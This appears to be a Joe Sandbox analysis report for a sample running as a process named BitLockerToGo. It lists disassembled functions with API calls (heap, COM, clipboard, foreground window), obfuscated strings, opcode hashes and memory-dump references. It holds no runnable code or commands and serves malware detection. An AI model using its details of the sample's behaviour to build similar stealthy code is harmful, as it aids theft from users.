                                                                                                                                                                          • Instruction ID: dd5defce2b942ec2088a2711cbd035aa23255bd63a643a8edf8abe79241e31fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 3c71e2226e8c851433d7d95e565c2f009b9be9b20bd935852684ed765de002f7
                                                                                                                                                                          • Instruction Fuzzy Hash: C1B16C71F083209BD710DE54D88177B7792EF85314F98852EE8858B356E37CDD16839A
                                                                                                                                                                          Function 00444200 Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00444275
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: acf2d24f1801303b85d37d33e3fad070c0ecd0e87c6cc86b1154880487b595d3
                                                                                                                                                                          • Instruction ID: 650d2d174b858adb30b1fe32c8abeb22e8a1e3c9dda950aa54f6d1c114007f05
                                                                                                                                                                          • Opcode Fuzzy Hash: acf2d24f1801303b85d37d33e3fad070c0ecd0e87c6cc86b1154880487b595d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 8911887098A30087E3086B30BD626AB3765EF57386F04047EE88163693C27ED859C69B
                                                                                                                                                                          Function 0043D8D0 Relevance: 1.6, APIs: 1, Instructions: 65comCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0044AB30,00000000,00000001,0044AB20,00000000), ref: 0043D9DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 542301482-0
                                                                                                                                                                          • Opcode ID: 27d253f8f930e3fe0f9be234cad446f85956db55832bd60ce15f4b12e7bcacd8
                                                                                                                                                                          • Instruction ID: e0ff025836235197c4d72c12eaa34ffcf18c2ef1548df4c58337924edd7b00df
                                                                                                                                                                          • Opcode Fuzzy Hash: 27d253f8f930e3fe0f9be234cad446f85956db55832bd60ce15f4b12e7bcacd8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4921BAB1058348AFE310CF12C846B6BBBE4FBC5705F00891DF1D41B280EBB99909CBA6
                                                                                                                                                                          Function 004442C0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0044781A,005C003F,00000006,?,?,00000018,?,?,?), ref: 004442EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                          Function 0041F8F4 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7ee7f36f8b1c31c05cd2fe01c4a3b2c0ca0a84ceaf716178feb048dec637aeea
                                                                                                                                                                          • Instruction ID: 7184001dda081846bda17e4673fd686dda6da311fc5397dd8e4165227f4b630b
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ee7f36f8b1c31c05cd2fe01c4a3b2c0ca0a84ceaf716178feb048dec637aeea
                                                                                                                                                                          • Instruction Fuzzy Hash: 379114B5908311CBD7248F24D8627BB73A1FF95348F04483EE88A97391E73D984AC796
                                                                                                                                                                          Function 00447F40 Relevance: .3, Instructions: 274COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: bddecc69b3b188f9068ae6243d68d0200737bcb9f5c751eed9ae8aaa04895d6a
                                                                                                                                                                          • Instruction ID: 79c6c9ce9818392080007ae82da97a66b28a4cf0916767f4d1f749a2f9746b92
                                                                                                                                                                          • Opcode Fuzzy Hash: bddecc69b3b188f9068ae6243d68d0200737bcb9f5c751eed9ae8aaa04895d6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 72815336A043019BE724DF28C84072FB3A2EFD5751F1A846EE9859B355EF74DD018789
                                                                                                                                                                          Function 004108C6 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 43f80381c0f4c54bce48b2cf05c6e961f0dd350ea6331be4f6a442396fe08a6e
                                                                                                                                                                          • Instruction ID: c19ea888a829bc12250ef0efbbd48755bba95174001d63de8f22be3489d76558
                                                                                                                                                                          • Opcode Fuzzy Hash: 43f80381c0f4c54bce48b2cf05c6e961f0dd350ea6331be4f6a442396fe08a6e
                                                                                                                                                                          • Instruction Fuzzy Hash: DB311EB591021A8BEB00CFA0C860BFEB774FF55705F14411AE841BB395DBB89D41CB68
                                                                                                                                                                          Function 00443A46 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05abf36f9a8003e91a2efd59be1dc3cd8fc5b3ec341ad228425099d4e94ab7ab
                                                                                                                                                                          • Instruction ID: 8525b8ac482b7ba8fd18af1338825266ca8dc8f23f6ec43551a7c56a51d33395
                                                                                                                                                                          • Opcode Fuzzy Hash: 05abf36f9a8003e91a2efd59be1dc3cd8fc5b3ec341ad228425099d4e94ab7ab
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B01DE7AA04246BFC304CF29CC00629BB72BB86310F24C699D4B9A7B04C330F506CB99
                                                                                                                                                                          Function 00441240 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 828 441240-441251 829 441258-441275 828->829 830 4412db-4412e1 828->830 831 441280-4412c7 829->831 831->831 832 4412c9-4412d5 RtlFreeHeap 831->832 832->830
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?), ref: 004412D5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                          • String ID: ~ORr
                                                                                                                                                                          • API String ID: 3298025750-3890539912
                                                                                                                                                                          • Opcode ID: a7ed311b7ecd59a3d18b07814651be31a717d42e4bac7d9a8bad73ba3a0446d2
                                                                                                                                                                          • Instruction ID: c9f9eb99d00e1ccfe8cae45bf923cca7ed5081ffcd2c64005d4b2a203a6a678e
                                                                                                                                                                          • Opcode Fuzzy Hash: a7ed311b7ecd59a3d18b07814651be31a717d42e4bac7d9a8bad73ba3a0446d2
                                                                                                                                                                          • Instruction Fuzzy Hash: FD0168366903148BD300CBA8EC94AA777A1EBC5312F2A053ED8C14B791D7759C1AC7E1
                                                                                                                                                                          Function 00444FB4 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00444FB4
                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00444FD0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2020703349-0
                                                                                                                                                                          • Opcode ID: c56994efcee5e27c2b8b0f89403b9397af5f81ed903007a2ff787e736b492b78
                                                                                                                                                                          • Instruction ID: 6e142f68f1c9173ed153f8532b88a0b4ae2c747098d469ef641d0911125606f4
                                                                                                                                                                          • Opcode Fuzzy Hash: c56994efcee5e27c2b8b0f89403b9397af5f81ed903007a2ff787e736b492b78
                                                                                                                                                                          • Instruction Fuzzy Hash: 03D0A9BE4214019BE208EB21BC4A4FA3712EB4330E704043BF50701233EB389107CA9E
                                                                                                                                                                          Function 0043D9EC Relevance: 1.6, APIs: 1, Instructions: 69memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SysAllocString.OLEAUT32(01D707D6), ref: 0043DA94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2525500382-0
                                                                                                                                                                          • Opcode ID: d0f162de579ce5efdbbd3767b9a4c64b4b3e0b1bac443ed873df5aca819328f3
                                                                                                                                                                          • Instruction ID: 7d2b66b2e687996aac93d182975d32ec1845b0578f073ee9b9e3d440059385a9
                                                                                                                                                                          • Opcode Fuzzy Hash: d0f162de579ce5efdbbd3767b9a4c64b4b3e0b1bac443ed873df5aca819328f3
                                                                                                                                                                          • Instruction Fuzzy Hash: B91123769087205BD300CF28C80831BBAE1AFC6315F19CA5CB8D9AB390D7B4C805CBC2
                                                                                                                                                                          Function 004411D2 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 0044122D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: 82e21c62ed8b12385b2a3ddd007e77788390f306fee56a4348f52a75e03f8d24
                                                                                                                                                                          • Instruction ID: c12bc51a89f5dcb68f3a78adc6c6e68f4b62e3801d607ea38d2c64e7291d765c
                                                                                                                                                                          • Opcode Fuzzy Hash: 82e21c62ed8b12385b2a3ddd007e77788390f306fee56a4348f52a75e03f8d24
                                                                                                                                                                          • Instruction Fuzzy Hash: D9F02B33E155204BE71D9628EC60A6FB643DBD9605F3F857DC6C1A3B68CD746C0286C4
                                                                                                                                                                          Function 004372CF Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                          • Opcode ID: 9e9ff80d164c44ffbae2fc7f928a73e22c391e4abbeb5f0ce5d873e7abcc6b39
                                                                                                                                                                          • Instruction ID: 7f52dd9f2f6fff54471cfa0eb39a74ef5115ca04b36049c3c855d4fad7ed04ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9ff80d164c44ffbae2fc7f928a73e22c391e4abbeb5f0ce5d873e7abcc6b39
                                                                                                                                                                          • Instruction Fuzzy Hash: 84F07FB42097028FE350DF25C1A974BBBE1BB85308F10C91CE4A54B290DBB9A9498FC2
                                                                                                                                                                          Function 004369E8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                          • Opcode ID: fb5d40af6ca2c0883614e4ea179b561b13e0b4699f0ebae9c99d8016c731c24b
                                                                                                                                                                          • Instruction ID: 7039392e6d56b3b7f4386521318ffa24b2ba1af750e806eedf90d8c1f23d3c67
                                                                                                                                                                          • Opcode Fuzzy Hash: fb5d40af6ca2c0883614e4ea179b561b13e0b4699f0ebae9c99d8016c731c24b
                                                                                                                                                                          • Instruction Fuzzy Hash: 00F01FB46083429FE320DF25C56975BBBE4BB85348F10891CE4984B291C7BA99498FC6
                                                                                                                                                                          Function 00411761 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411773
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                          • Opcode ID: 9bfb7e78e804079e0c46e3f94306e994fa1dd51ccba10bceb8791853c0812004
                                                                                                                                                                          • Instruction ID: 4fcdb96608f709017490788b749a5a3361cda3ac1f0383e1edee956c8f3d69ec
                                                                                                                                                                          • Opcode Fuzzy Hash: 9bfb7e78e804079e0c46e3f94306e994fa1dd51ccba10bceb8791853c0812004
                                                                                                                                                                          • Instruction Fuzzy Hash: 53D092343CC300B6F2300B08BC27F043250A303F22F700324B3247C0E58AE071008A1D
                                                                                                                                                                          Function 0043DAC4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043DAD6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: BlanketProxy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3890896728-0
                                                                                                                                                                          • Opcode ID: 71245369313d495854a1a26fba33b3fbc8c9e40afcf87db60567100b52f09851
                                                                                                                                                                          • Instruction ID: 7e3a72a5d4681110314f2f29f3b07a3ff5a1a90310276de2c07d4fad2e42eee6
                                                                                                                                                                          • Opcode Fuzzy Hash: 71245369313d495854a1a26fba33b3fbc8c9e40afcf87db60567100b52f09851
                                                                                                                                                                          • Instruction Fuzzy Hash: F1D04C347D4304B7F2310B15FC17F047525B746F03F600521B3457C0E18AF1A2109A4D
                                                                                                                                                                          Function 00411740 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00411751
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                          • Opcode ID: cf3f469b507755306c6ee0754248f955b1068e730f00a642d7acef524aaa597c
                                                                                                                                                                          • Instruction ID: 822c6d977317d53c2a5c11aee2e0c90b5f34371c0e42fed4ad2a9cafb58682c7
                                                                                                                                                                          • Opcode Fuzzy Hash: cf3f469b507755306c6ee0754248f955b1068e730f00a642d7acef524aaa597c
                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC08C30418208BBF220272DAD0AF03392CD303729F000330B9A0440D2AA606814C5FA

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00421AB0 Relevance: 25.3, Strings: 19, Instructions: 1504COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $%fs!$()&'$22.h$45$8967$9:;4$@`Sr$MNOH$OP[9$Q[EV$cHo|$ijkd$lCax$nvwp$s.!1$x$yz{{$|
                                                                                                                                                                          • API String ID: 0-1735489010
                                                                                                                                                                          • Opcode ID: a3ae3db1f72cbcd01799b68ac05e9a23c4a2c241fd77e3024f9ec7de06e459f2
                                                                                                                                                                          • Instruction ID: d27214582b08baf78050c3c4ae73fac2aabddd8c46f21acc2db907ee47230ca5
                                                                                                                                                                          • Opcode Fuzzy Hash: a3ae3db1f72cbcd01799b68ac05e9a23c4a2c241fd77e3024f9ec7de06e459f2
                                                                                                                                                                          • Instruction Fuzzy Hash: 76B221706083819BE734CF24D8907ABBBE2EFD6304F58891DE5C98B392D7B89405CB56
                                                                                                                                                                          Function 00401000 Relevance: 19.5, Strings: 14, Instructions: 2000COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                                                                                                                          • API String ID: 0-3131871939
                                                                                                                                                                          • Opcode ID: 39662a6afeb9aa7edc3b52a31259f0bf16b8304617e35ebb9e108bc35c868c1f
                                                                                                                                                                          • Instruction ID: 38ece412f4d1305739310bafe47528d0b9afabff695d8be9c639c9a59b3ea4ed
                                                                                                                                                                          • Opcode Fuzzy Hash: 39662a6afeb9aa7edc3b52a31259f0bf16b8304617e35ebb9e108bc35c868c1f
                                                                                                                                                                          • Instruction Fuzzy Hash: 09E2F2716093418FC718CF28C49436BBBE2AB95314F18867EE495AB3D1D378DD46CB8A
                                                                                                                                                                          Function 00420FE9 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 478COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: PW$Y|$wr
                                                                                                                                                                          • API String ID: 0-2263561277
                                                                                                                                                                          • Opcode ID: 6d99af540e4abc2612ea7af0babd86b67eba03daaf8d0dec55b00adec6f609bb
                                                                                                                                                                          • Instruction ID: 836e795dc3a6a6951465090a0755d9f24f51ce8379c934f2512c7f5bdaf57535
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d99af540e4abc2612ea7af0babd86b67eba03daaf8d0dec55b00adec6f609bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 6012BEB5609391CBC324CF29D8512ABBBE1FFD5314F148A2DE4D98B390E7389941CB86
                                                                                                                                                                          Function 00438A30 Relevance: 9.1, APIs: 6, Instructions: 139clipboardCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1647500905-0
                                                                                                                                                                          • Opcode ID: 382aa81443e1c6d37f1c81bea4e41c4af0190f2b80d24c27bdab5bd6368e22b9
                                                                                                                                                                          • Instruction ID: 5b89dc6d59e55e3a6ce5feea3654ac742ab26a8dce0357985b57151cb4c0cb17
                                                                                                                                                                          • Opcode Fuzzy Hash: 382aa81443e1c6d37f1c81bea4e41c4af0190f2b80d24c27bdab5bd6368e22b9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6451B6B1D087468FDB00ABBC94453AEFFB09B16320F14467EF4A1962C1D6389646C797
                                                                                                                                                                          Function 0042D420 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 325COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: *$2B$<=$LP
                                                                                                                                                                          • API String ID: 0-162656369
                                                                                                                                                                          • Opcode ID: bba36f24c102c591de2bffe78ed3c7827764e049e7a281ab1cb89b4d76fdc406
                                                                                                                                                                          • Instruction ID: bdb2b4ff058e132cd50c61e93f34de9b76f6ead3cd9f4328d69b624b3b7e3af3
                                                                                                                                                                          • Opcode Fuzzy Hash: bba36f24c102c591de2bffe78ed3c7827764e049e7a281ab1cb89b4d76fdc406
                                                                                                                                                                          • Instruction Fuzzy Hash: FDA1EDB2A083419BE310DF21E84025BBBE2FFC6354F54892DE4C59B351E7788949CB87
                                                                                                                                                                          Function 004466F0 Relevance: 8.4, Strings: 6, Instructions: 925COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 6a210df2170431f10f028ff0b25c52225aa814bdfac35bdaf061c6ccc0928756
                                                                                                                                                                          • Instruction ID: 2ad0054f88d0a31c720170a2ac0a191b5e12152168221190a788aedced7b7e39
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a210df2170431f10f028ff0b25c52225aa814bdfac35bdaf061c6ccc0928756
                                                                                                                                                                          • Instruction Fuzzy Hash: 25521276B08311CFD708CF28D8A026AB7E2FB8A315F1A847ED48697352D774D946CB85
                                                                                                                                                                          Function 00446AA0 Relevance: 8.2, Strings: 6, Instructions: 689COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2038546385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: "rD$MNOP$RlD$bpD$koD$rlD
                                                                                                                                                                          • API String ID: 0-406179893
                                                                                                                                                                          • Opcode ID: 3afd024c09c8f4e3f9e038fed5b0680b3e0905bc20750ea30bb0639aa7960774
                                                                                                                                                                          • Instruction ID: 0d3c0a34b0c7f2bda6b9c2ad40935ae2538b764a9e03d8a77062fe5cf5224ad0
                                                                                                                                                                          • Opcode Fuzzy Hash: 3afd024c09c8f4e3f9e038fed5b0680b3e0905bc20750ea30bb0639aa7960774
                                                                                                                                                                          • Instruction Fuzzy Hash: 7422FD36B08311CFC708CF68E99026AB7E2FB8A315F1A857ED48597762D374E845CB85
                                                                                                                                                                          Function 00446BB0 Relevance: 8.2, Strings: 6, Instructions: 672COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
